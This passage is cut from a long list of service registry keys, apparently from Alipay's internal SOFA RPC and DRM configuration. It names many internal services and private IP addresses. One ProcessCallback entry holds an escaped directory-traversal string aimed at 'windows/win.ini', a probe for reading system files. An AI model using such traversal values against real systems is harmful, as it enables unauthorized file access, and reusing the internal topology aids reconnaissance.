A","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:gfsettle@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue52#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:tr_datafactory_acts_test_sucnull@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.funduser.QuotaAuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.core.ArchDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.config.ServerlessConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromoscene.common.service.facade.api.united.FinsUnitedExtQueryCurZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.tradecal.KbTradeCalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.monitor.DiagnoseServerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequote.api.SymbolSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certifymng.revolmng.service.facade.RevolScriptCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.216.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilelbs.common.service.facade.UserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscharityprod.common.service.facade.mng.InsureBatchManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffgroup-region#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linka.common.service.facade.pmd.PmdFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.platform.sell.institution@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.acctrans.facade.ProxyAccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.da.common.service.facade.api.CrowdOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue46:threelevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","insclaiminvestprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SCHEDULER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yebquery.common.facade.service.FundAssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSCLAIMINVESTPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.disableSchemeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkfinconsign.common.service.facade.datasync.AssetTransSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.o2o.facade.EquipmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.kubernetes.KubernetesResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_SC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.174.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dt.onedata.dwm.client.code.ModelCustomTaskContentOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-F-MINITRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S_cooperservice_timerTask#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:zmmemberop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomercore.common.service.facade.passport.PassCredentialServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mnotify@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.117.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fpdecision.platform.common.service.facade.iface.AgdsLeapByTrusteeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DWALM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpApproveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.shared.manager.drm.ContentSystemParamDRM.pushSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antgraph.facade.GeaBaseServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.service.metadata.MetadataQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.236.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finstore.common.service.facade.fop.mng.DiscountCampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.145.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.emccenter.common.service.facade.api.EmergencyDomainManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.184.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.common.service.facade.api.risk.InsRiskApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.UserFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.168.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lendpofprod.common.service.facade.loanapi.trans.RepayTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:xbricks#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_S_ACCORDERCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundprod.common.service.facade.product.manage.FundDividendManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.76.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.24.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tbx.common.service.facade.TbxOpenCVFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.clvuser.ClvUserService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditbillcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.uctfront:name=com.alipay.analyze.core.extension.tier.module.drm.DecisionModelControlResource.switchStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.146.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.uioservice.common.service.facade.api.PricingSchemeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iclientgw.adapterservice.web.MobileRPCAdapterFacade:1.0:securitysimulate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:createCycleInstanceTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.ShadowControlDrmResource.shadowSignCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opsfree.facade.spi.OpsfreeActionProcessSpi:1.0:huanyu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accreditcore.common.service.facade.PrepaidCreditControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.allNewInsured,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.data.MiniAssistPublicNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.robot.RobotBroadcastFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.timeoutcallback.TimeoutCallbackGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.guardianconsole.facade.configs.service.GuardianAdaptiveLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cloud.apfasmng.common.service.facade.operationrecord.OperationRecordFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrchpromoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.242.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.mordercenter.MocKbOrderCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa4demo_cmpr.Sofa4TRService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\.\\\\/\\\\.\\\\windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.keplerweb.keplerui_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.ruleengine.service.ReBizActionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudpay.openapi.merchant.MerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.finnet.service.drm.ChannelFilterDRM.influxExchangeCodeWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprobe.common.service.facade.contractquality.api.parse.ParseService:1.0:lark@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.todayfocus.TodayFocusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:insttrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:sesameCredit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.camprules.ScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.18.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.tmallOverseaExchangeRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.baopoint.api.BpdtransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.deploy.DeploymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantGzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.aeicore.common.service.facade.AccountManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.Arch:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityHbaseConfigResource.hbaseLogOpen,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcactivitycore.facade.play.UserRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprerec.service.bizcov.GrayBizCovQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cfpcenter.ecm.biz.task.drm.EcmTaskConfigDrmResource.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.issue.template.scene.standard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ALIPAYCOMMONSESSION:name=com.alipay.common.webx.session.drm.SessionWhiteListListener.whiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.pcardsales.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.biz.lisa.service.eworkcard.EntProductStateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.rec.api.RecCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.fc.arcore.abtest.abTestBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.blackitem.BlackWebsiteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.katongprod.common.service.facade.management.KatongCardQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.27.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acpartner.common.service.facade.RebateContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-6262@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxbase.common.event.EventHandler:1.0:ifxpositionDummyTradeHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","mc.HelloService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zappinfo.jiuzhou_local_slave_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.127.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordermng.common.service.api.exterface.ExterfaceOrderProcessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dataqualitytestsvr.envfacade.facade.EnvRegisterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sccounter.facade.UserSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aldata.common.service.facade.api.CacheDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.cloud.endpoint.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.InterfaceTestDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.gfas.core.config.drm.GfasDrmResource.quotaBucketInitialNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.Arch:name=com.alipay.xts.ldc.revcore.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:insautobff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:risk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcloanmng.service.api.intellectput.service.IntellectBenefitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_DATA_USER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.176.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instopen.service.facade.document.ResourceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.notify.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.chongzhimobile.client.OrderUnitService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrchselfop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.facade.CardBinModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.remit.RemitInquiryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.PermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.MiniLoanOperateDrm.databusProdTransStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.gloancore.common.service.facade.bill.api.LcBillInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.morderprod:name=com.alipay.morderprod.switch.excludeArByPidPdCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifecore.common.service.facade.industry.IndustryViewOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acfeeweb.common.service.facade.ProductBillingCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:sdabombardier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.algointervention.AlgoInterventionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2_dest.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.consumecenter.common.service.mng.facade.SyncRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.sendIssueMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicPullRequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.105.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:zmhatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertBackupService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:govbizprodsys@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.SendSmsProxyService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.GroupIdentityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.NoticeFacade:1.0:tNoticeFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_CARDPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antcloud.ifcidentitycloud.common.service.facade.mic.zproxy.VerifyZpFacade:1.0:ifcidentitycloudus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmap.core.service.api.ComponentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.sub03:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.RiskDefenseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.indirectSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_FC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdalproxyquery:name=com.alipay.anthubble.proxy.ExecutionPlanChecker.maxAllowedRows,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.OperatorFacade2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.security.verity.MdpModelResourceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.244.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pushcore.facade.XPushFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.249.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.meshysale.common.service.facade.crypt.CryptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isasp.service.facade.isasp.InsuranceOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbshopdecorate.common.service.facade.kbserv.decorate.GrayManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.236.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:mappprodSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apopscompose.common.service.facade.processinstance.ProcessInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.92.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tradequery.common.service.facade.TradeProcessQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenesas.common.service.facade.api.task.TaskTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ReconInstConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.billscenter.InstoperationBalaRecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mcardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.common.util.drm.ClusterConfigResource.clusterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkcreditgrowup.common.facade.api.TaskFacade:1.0:taskFacadeForZpRZone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundmng.common.service.integration.assettrans.FaAssetTransClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_PRE_AUTH_PROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cstrategycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:morderprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.engine.validation.client.DecisionValidationClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linku.common.service.facade.notify.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.abilityprod.common.service.facade.plugin.AbilityPluginConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.applepay.facade.ProvisioningBundleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chair-script:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbpromodataaggr.common.service.facade.api.InventoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:workflowMatterAfterFinishCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.mwalletmng.mwalletmng_dataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_